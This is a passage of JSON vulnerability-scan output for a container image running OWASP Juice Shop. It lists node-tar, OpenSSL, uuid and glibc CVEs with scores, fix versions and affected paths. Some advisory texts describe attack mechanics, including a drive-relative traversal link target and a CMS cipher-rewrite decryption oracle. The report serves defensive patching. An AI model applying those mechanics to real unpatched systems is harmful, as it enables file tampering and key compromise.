Extraction","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N","metrics":{"baseScore":7.1,"exploitabilityScore":1.9,"impactScore":5.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-26960","epss":0.00288,"percentile":0.2028,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-26960","cwe":"CWE-22","source":"security-advisories@github.com","type":"Primary"}],"fix":{"versions":["7.5.8"],"state":"fixed","available":[{"version":"7.5.8","date":"2026-03-04","kind":"first-observed"}]},"advisories":[],"risk":0.21023999999999998},"relatedVulnerabilities":[{"id":"CVE-2026-26960","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-26960","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384","https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f","https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx"],"description":"node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N","metrics":{"baseScore":7.1,"exploitabilityScore":1.9,"impactScore":5.2},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N","metrics":{"baseScore":7.1,"exploitabilityScore":1.9,"impactScore":5.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-26960","epss":0.00288,"percentile":0.2028,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-26960","cwe":"CWE-22","source":"security-advisories@github.com","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"tar","version":"4.4.19"}},"found":{"vulnerabilityID":"GHSA-83g3-92jg-28cx","versionConstraint":"<7.5.8 (semantic)"},"fix":{"suggestedVersion":"7.5.8"}}],"artifact":{"id":"pkg:npm/tar@4.4.19?package-id=f42c59d94c10b95d","name":"tar","version":"4.4.19","type":"npm","locations":[{"path":"/juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["ISC"],"cpes":["cpe:2.3:a:tar_project:tar:4.4.19:*:*:*:*:node.js:*:*","cpe:2.3:a:isaacs:tar:4.4.19:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/tar@4.4.19","upstreams":[]}},{"vulnerability":{"id":"GHSA-83g3-92jg-28cx","dataSource":"https://github.com/advisories/GHSA-83g3-92jg-28cx","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx","https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384","https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f","https://nvd.nist.gov/vuln/detail/CVE-2026-26960"],"description":"Arbitrary File Read/Write via Hardlink Target Escape Through Symlink Chain in node-tar Extraction","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N","metrics":{"baseScore":7.1,"exploitabilityScore":1.9,"impactScore":5.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-26960","epss":0.00288,"percentile":0.2028,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-26960","cwe":"CWE-22","source":"security-advisories@github.com","type":"Primary"}],"fix":{"versions":["7.5.8"],"state":"fixed","available":[{"version":"7.5.8","date":"2026-03-04","kind":"first-observed"}]},"advisories":[],"risk":0.21023999999999998},"relatedVulnerabilities":[{"id":"CVE-2026-26960","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-26960","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384","https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f","https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx"],"description":"node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N","metrics":{"baseScore":7.1,"exploitabilityScore":1.9,"impactScore":5.2},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N","metrics":{"baseScore":7.1,"exploitabilityScore":1.9,"impactScore":5.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-26960","epss":0.00288,"percentile":0.2028,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-26960","cwe":"CWE-22","source":"security-advisories@github.com","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"tar","version":"6.2.1"}},"found":{"vulnerabilityID":"GHSA-83g3-92jg-28cx","versionConstraint":"<7.5.8 (semantic)"},"fix":{"suggestedVersion":"7.5.8"}}],"artifact":{"id":"pkg:npm/tar@6.2.1?package-id=09de397807f7641f","name":"tar","version":"6.2.1","type":"npm","locations":[{"path":"/juice-shop/node_modules/sqlite3/node_modules/tar/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["ISC"],"cpes":["cpe:2.3:a:tar_project:tar:6.2.1:*:*:*:*:node.js:*:*","cpe:2.3:a:isaacs:tar:6.2.1:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/tar@6.2.1","upstreams":[]}},{"vulnerability":{"id":"GHSA-9ppj-qmqm-q256","dataSource":"https://github.com/advisories/GHSA-9ppj-qmqm-q256","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256","https://nvd.nist.gov/vuln/detail/CVE-2026-31802","https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad"],"description":"node-tar Symlink Path Traversal via Drive-Relative Linkpath","cvss":[{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N","metrics":{"baseScore":8.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-31802","epss":0.00253,"percentile":0.16368,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-31802","cwe":"CWE-22","source":"security-advisories@github.com","type":"Secondary"}],"fix":{"versions":["7.5.11"],"state":"fixed","available":[{"version":"7.5.11","date":"2026-03-11","kind":"first-observed"}]},"advisories":[],"risk":0.198605},"relatedVulnerabilities":[{"id":"CVE-2026-31802","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-31802","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad","https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256"],"description":"node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","metrics":{"baseScore":5.5,"exploitabilityScore":1.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","metrics":{"baseScore":8.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-31802","epss":0.00253,"percentile":0.16368,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-31802","cwe":"CWE-22","source":"security-advisories@github.com","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"tar","version":"4.4.19"}},"found":{"vulnerabilityID":"GHSA-9ppj-qmqm-q256","versionConstraint":"<=7.5.10 (semantic)"},"fix":{"suggestedVersion":"7.5.11"}}],"artifact":{"id":"pkg:npm/tar@4.4.19?package-id=f42c59d94c10b95d","name":"tar","version":"4.4.19","type":"npm","locations":[{"path":"/juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["ISC"],"cpes":["cpe:2.3:a:tar_project:tar:4.4.19:*:*:*:*:node.js:*:*","cpe:2.3:a:isaacs:tar:4.4.19:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/tar@4.4.19","upstreams":[]}},{"vulnerability":{"id":"GHSA-9ppj-qmqm-q256","dataSource":"https://github.com/advisories/GHSA-9ppj-qmqm-q256","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256","https://nvd.nist.gov/vuln/detail/CVE-2026-31802","https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad"],"description":"node-tar Symlink Path Traversal via Drive-Relative Linkpath","cvss":[{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N","metrics":{"baseScore":8.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-31802","epss":0.00253,"percentile":0.16368,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-31802","cwe":"CWE-22","source":"security-advisories@github.com","type":"Secondary"}],"fix":{"versions":["7.5.11"],"state":"fixed","available":[{"version":"7.5.11","date":"2026-03-11","kind":"first-observed"}]},"advisories":[],"risk":0.198605},"relatedVulnerabilities":[{"id":"CVE-2026-31802","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-31802","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad","https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256"],"description":"node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","metrics":{"baseScore":5.5,"exploitabilityScore":1.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","metrics":{"baseScore":8.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-31802","epss":0.00253,"percentile":0.16368,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-31802","cwe":"CWE-22","source":"security-advisories@github.com","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"tar","version":"6.2.1"}},"found":{"vulnerabilityID":"GHSA-9ppj-qmqm-q256","versionConstraint":"<=7.5.10 (semantic)"},"fix":{"suggestedVersion":"7.5.11"}}],"artifact":{"id":"pkg:npm/tar@6.2.1?package-id=09de397807f7641f","name":"tar","version":"6.2.1","type":"npm","locations":[{"path":"/juice-shop/node_modules/sqlite3/node_modules/tar/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["ISC"],"cpes":["cpe:2.3:a:tar_project:tar:6.2.1:*:*:*:*:node.js:*:*","cpe:2.3:a:isaacs:tar:6.2.1:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/tar@6.2.1","upstreams":[]}},{"vulnerability":{"id":"CVE-2026-34182","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-34182","namespace":"debian:distro:debian:13","severity":"Critical","urls":[],"description":"Issue Summary: Cryptographic Message Services (CMS) processing fails to perform sufficient input validation on the cipher and tag length fields of AuthEnvelopedData containers, leading to various potential compromises. Impact Summary: Attackers making use of these vulnerabilities may achieve key-equivalent functionality for a given CMS recipient and/or bypass integrity validation for a given message. In one use case, an attacker may send a CMS message containing AuthEnvelopedData with the cipher specified as a non-AEAD cipher. OpenSSL erroneously allows this selection, and attempts to decrypt and validate the message. An on-path attacker who captures one legitimate AES-GCM AuthEnvelopedData addressed to the victim can re-emit it with the recipientInfos set left byte-for-byte intact, so the victim's private key still unwraps the genuine CEK (the content-encryption key), but with the inner OID rewritten to AES-256-OFB (Output Feedback Mode, an unauthenticated keystream mode) and with an attacker-chosen IV and ciphertext. The victim initializes AES-256-OFB under the real CEK, never consults the MAC field, and CMS_decrypt() returns success. If the application under attack responds to the attacker with any indicator showing success or failure of the decryption effort, it is possible for the attacker to use this as an oracle to obtain key equivalent functionality for the CEK used for the chosen recipient of the message. In another use case, an attacker can reduce the tag length of the chosen AEAD cipher for a given AuthEnvelopedData container to be a single byte long, allowing an attacker to brute force CMS decryption, producing an integrity bypass for applications that trust CMS_decrypt() to reject modified content. The FIPS modules are not affected by this issue.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N","metrics":{"baseScore":9.1,"exploitabilityScore":3.9,"impactScore":5.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-34182","epss":0.00208,"percentile":0.10916,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-34182","cwe":"CWE-354","source":"openssl-security@openssl.org","type":"Secondary"}],"fix":{"versions":["3.5.6-1~deb13u2"],"state":"fixed","available":[{"version":"3.5.6-1~deb13u2","date":"2026-06-09","kind":"advisory"}]},"advisories":[{"id":"DSA-6335-1","link":"https://security-tracker.debian.org/tracker/DSA-6335-1"}],"risk":0.18824},"relatedVulnerabilities":[{"id":"CVE-2026-34182","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-34182","namespace":"nvd:cpe","severity":"Critical","urls":["https://github.com/openssl/openssl/commit/03c1f4d45fb963aee7d5833390c507cd290182bc","https://github.com/openssl/openssl/commit/439ed7d2c0962ce964482727264668bf277c333f","https://github.com/openssl/openssl/commit/7947e6a81eb8776802f159fb6762cb7fcf7e34c7","https://github.com/openssl/openssl/commit/9fd97f8cfdc2c0be214998de3b2b55c8edf6c7ac","https://github.com/openssl/openssl/commit/d2ca86bcd43e4f17d899f347101766b6107676e0","https://openssl-library.org/news/secadv/20260609.txt"],"description":"Issue Summary: Cryptographic Message Services (CMS) processing fails to perform\nsufficient input validation on the cipher and tag length fields of\nAuthEnvelopedData containers, leading to various potential compromises.\n\nImpact Summary: Attackers making use of these vulnerabilities may achieve\nkey-equivalent functionality for a given CMS recipient and/or bypass integrity\nvalidation for a given message.\n\nIn one use case, an attacker may send a CMS message containing\nAuthEnvelopedData with the cipher specified as a non-AEAD cipher. OpenSSL\nerroneously allows this selection, and attempts to decrypt and validate the\nmessage.\n\nAn on-path attacker who captures one legitimate AES-GCM AuthEnvelopedData\naddressed to the victim can re-emit it with the recipientInfos set left\nbyte-for-byte intact, so the victim's private key still unwraps the genuine CEK\n(the content-encryption key), but with the inner OID rewritten to AES-256-OFB\n(Output Feedback Mode, an unauthenticated keystream mode) and with an\nattacker-chosen IV and ciphertext. The victim initializes AES-256-OFB under the\nreal CEK, never consults the MAC field, and CMS_decrypt() returns success.\n\nIf the application under attack responds to the attacker with any indicator\nshowing success or failure of the decryption effort, it is possible for the\nattacker to use this as an oracle to obtain key equivalent functionality for the\nCEK used for the chosen recipient of the message.\n\nIn another use case, an attacker can reduce the tag length of the chosen AEAD\ncipher for a given AuthEnvelopedData container to be a single byte long,\nallowing an attacker to brute force CMS decryption, producing an integrity\nbypass for applications that trust CMS_decrypt() to reject modified content.\n\nThe FIPS modules are not affected by this issue.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N","metrics":{"baseScore":9.1,"exploitabilityScore":3.9,"impactScore":5.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-34182","epss":0.00208,"percentile":0.10916,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-34182","cwe":"CWE-354","source":"openssl-security@openssl.org","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"openssl","version":"3.5.5-1~deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-34182","versionConstraint":"< 3.5.6-1~deb13u2 (deb)"},"fix":{"suggestedVersion":"3.5.6-1~deb13u2"}}],"artifact":{"id":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&package-id=d839547e5a6a801d&upstream=openssl","name":"libssl3t64","version":"3.5.5-1~deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libssl3t64/copyright","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64.md5sums","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""}],"language":"","licenses":["Apache-2.0","Artistic","GPL-1.0-only","GPL-1.0-or-later"],"cpes":["cpe:2.3:a:libssl3t64:libssl3t64:3.5.5-1\\~deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&upstream=openssl","upstreams":[{"name":"openssl"}]}},{"vulnerability":{"id":"CVE-2026-42767","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-42767","namespace":"debian:distro:debian:13","severity":"Medium","urls":[],"description":"Issue summary: An attacker-controlled CMP (Certificate Management Protocol) server could trigger a NULL pointer dereference in a CMP client application. Impact summary: A NULL pointer dereference causes a crash of the application and a Denial of Service. An attacker controlling a CMP server (or acting as a man-in-the-middle) could craft a CMP response containing a CRMF (Certificate Request Message Format) CertRepMessage with an EncryptedValue structure where the symmAlg field has an algorithm OID but no parameters field. When the OpenSSL CMP client processes this response, the NULL dereference occurs, causing a crash of the CMP client. Applications that process untrusted CMP/CRMF messages may be affected. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":5.9,"exploitabilityScore":2.3,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-42767","epss":0.00344,"percentile":0.26044,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-42767","cwe":"CWE-476","source":"openssl-security@openssl.org","type":"Secondary"}],"fix":{"versions":["3.5.6-1~deb13u2"],"state":"fixed","available":[{"version":"3.5.6-1~deb13u2","date":"2026-06-10","kind":"first-observed"}]},"advisories":[],"risk":0.18748},"relatedVulnerabilities":[{"id":"CVE-2026-42767","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-42767","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/openssl/openssl/commit/61a86a8cd73546c9fea916f3d304c1293e05c046","https://github.com/openssl/openssl/commit/665d5254083affde9982efca7c41dd01cacc8774","https://github.com/openssl/openssl/commit/810b722f772652ad48042bcc7ab07e3414b11d0f","https://github.com/openssl/openssl/commit/b90ff3b1bd33b1c18e6a09936d097c2eddef8873","https://github.com/openssl/openssl/commit/e6f912907fc2ec82a0fd07aae55172c5e5e3d90d","https://openssl-library.org/news/secadv/20260609.txt"],"description":"Issue summary: An attacker-controlled CMP (Certificate Management Protocol)\nserver could trigger a NULL pointer dereference in a CMP client application.\n\nImpact summary: A NULL pointer dereference causes a crash of the\napplication and a Denial of Service.\n\nAn attacker controlling a CMP server (or acting as a man-in-the-middle) could\ncraft a CMP response containing a CRMF (Certificate Request Message Format)\nCertRepMessage with an EncryptedValue structure where the symmAlg field\nhas an algorithm OID but no parameters field. When the OpenSSL CMP client\nprocesses this response, the NULL dereference occurs, causing a crash of\nthe CMP client.\n\nApplications that process untrusted CMP/CRMF messages may be affected.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":5.9,"exploitabilityScore":2.3,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-42767","epss":0.00344,"percentile":0.26044,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-42767","cwe":"CWE-476","source":"openssl-security@openssl.org","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"openssl","version":"3.5.5-1~deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-42767","versionConstraint":"< 3.5.6-1~deb13u2 (deb)"},"fix":{"suggestedVersion":"3.5.6-1~deb13u2"}}],"artifact":{"id":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&package-id=d839547e5a6a801d&upstream=openssl","name":"libssl3t64","version":"3.5.5-1~deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libssl3t64/copyright","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64.md5sums","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""}],"language":"","licenses":["Apache-2.0","Artistic","GPL-1.0-only","GPL-1.0-or-later"],"cpes":["cpe:2.3:a:libssl3t64:libssl3t64:3.5.5-1\\~deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&upstream=openssl","upstreams":[{"name":"openssl"}]}},{"vulnerability":{"id":"GHSA-w5hq-g745-h8pq","dataSource":"https://github.com/advisories/GHSA-w5hq-g745-h8pq","namespace":"github:language:javascript","severity":"Medium","urls":["https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq","https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34","https://github.com/uuidjs/uuid/releases/tag/v14.0.0","https://nvd.nist.gov/vuln/detail/CVE-2026-41907","https://github.com/uuidjs/uuid/commit/32389c887c9e75f90442ee4cc95bbab0c4e8346e","https://github.com/uuidjs/uuid/commit/3d61d6ac1f782cf6b1dd8661c60f11722cd49a0d","https://github.com/uuidjs/uuid/commit/9d27ddf7046ce496ef39569ff84d948eeff9cb2a","https://github.com/uuidjs/uuid/releases/tag/v11.1.1","https://github.com/uuidjs/uuid/releases/tag/v12.0.1","https://github.com/uuidjs/uuid/releases/tag/v13.0.1"],"description":"uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}},{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N","metrics":{"baseScore":6.3},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-41907","epss":0.00311,"percentile":0.22625,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-41907","cwe":"CWE-787","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2026-41907","cwe":"CWE-823","source":"security-advisories@github.com","type":"Secondary"}],"fix":{"versions":["11.1.1"],"state":"fixed","available":[{"version":"11.1.1","date":"2026-05-05","kind":"first-observed"}]},"advisories":[],"risk":0.185045},"relatedVulnerabilities":[{"id":"CVE-2026-41907","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-41907","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq"],"description":"uuid is for the creation of RFC9562 (formerly RFC4122) UUIDs. Prior to 14.0.0, v3, v5, and v6 accept external output buffers but do not reject out-of-range writes (small buf or large offset). This allows silent partial writes into caller-provided buffers. This vulnerability is fixed in 14.0.0.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","metrics":{"baseScore":8.1},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-41907","epss":0.00311,"percentile":0.22625,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-41907","cwe":"CWE-787","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2026-41907","cwe":"CWE-823","source":"security-advisories@github.com","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"uuid","version":"8.3.2"}},"found":{"vulnerabilityID":"GHSA-w5hq-g745-h8pq","versionConstraint":"<11.1.1 (semantic)"},"fix":{"suggestedVersion":"11.1.1"}}],"artifact":{"id":"pkg:npm/uuid@8.3.2?package-id=75276f930d3cfafc","name":"uuid","version":"8.3.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/uuid/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:uuidjs:uuid:8.3.2:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/uuid@8.3.2","upstreams":[]}},{"vulnerability":{"id":"CVE-2026-6238","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-6238","namespace":"debian:distro:debian:13","severity":"Medium","urls":[],"description":"The deprecated functions ns_printrrf, ns_printrr and fp_nquery in the GNU C Library version 2.2 and newer fail to validate the RDATA content against the RDATA length in a DNS response when processing LOC, CERT, TKEY or TSIG records, which may allow an attacker to craft a DNS response, causing a target application to crash or read uninitialized memory. These functions are for application debugging only and hence not in the path of code executed by the DNS resolver. 